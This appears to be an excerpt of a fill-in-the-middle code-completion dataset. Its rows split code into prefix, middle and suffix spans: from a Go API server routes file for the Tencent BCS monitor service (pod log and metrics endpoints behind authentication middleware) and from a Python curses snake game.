file_name large_stringlengths 4 140 | prefix large_stringlengths 0 12.1k | suffix large_stringlengths 0 12k | middle large_stringlengths 0 7.51k | fim_type large_stringclasses 4
values |
|---|---|---|---|---|
routes.go | StackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
}
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview))
route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
route.GET("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.GET("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
route.POST("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
route.PUT("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
route.DELETE("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
route.GET("/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.POST("/service_monitors/batchdelete",
rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
route.GET("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.GET("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.GetPodMonitor))
route.POST("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
route.PUT("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
route.DELETE("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
route.GET("/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.POST("/pod_monitors/batchdelete",
rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
}
}
// RegisterStoreGWRoutes 注册storegw http-sd
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
router := route.New()
router.Get("/api/discovery/targetgroups", func(w http.ResponseWriter, r *http.R | equest) {
w.Header( | identifier_name | |
routes.go | files "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
}
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), m | route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces | iddleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview)) | identifier_body |
routes.go | files "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr |
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview))
route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/names | {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
} | conditional_block |
pysnake.py | .board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
